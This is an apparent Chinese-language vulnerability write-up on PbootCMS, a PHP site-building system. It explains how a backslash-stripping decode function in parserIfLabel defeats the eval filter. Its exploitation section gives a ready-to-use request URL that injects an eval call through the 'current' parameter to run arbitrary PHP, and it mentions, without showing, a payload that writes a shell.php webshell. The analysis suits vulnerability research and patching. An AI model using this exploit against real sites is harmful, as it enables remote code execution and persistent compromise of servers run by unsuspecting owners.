详细介绍:
0x00 cms简介
PbootCMS是翱云科技开发的全新内核且永久开源免费PHP企业网站开发建设管理系统,是一款高效、简洁、 强悍的建站系统,能够满足各类企业网站开发建设的需要。系统采用高效...
下载地址:https://gitee.com/hnaoyun/PbootCMS/releases?c=2
0x01 漏洞分析
漏洞文件:\apps\home\controller\ParserController.php 中的parserIfLabel函数:
比上个版本的修复方式就是对eval判断不区分大小写了,但是这里却经过了一个decode_string函数处理:
可以看到这个作用就是去除反斜杠,如果我们传入:eval\($_GET[1])既不会满足上面的if条件,在传入eval操作时又去掉了其中的反斜杠eval($_GET[1])造成了代码执行。
找调用地方:
符合该处正则的模板:\template\default\productlist.html
0x02 漏洞利用
直接访问:http://xxx.com/index.php/list/5/?current={pboot:if(eval\\($\_GET\[a\]))}1{/pboot:if}&a=phpinfo();
即可直接造成代码执行。
写入shell Payload:
即可在根目录成功写入一个shell.php文件。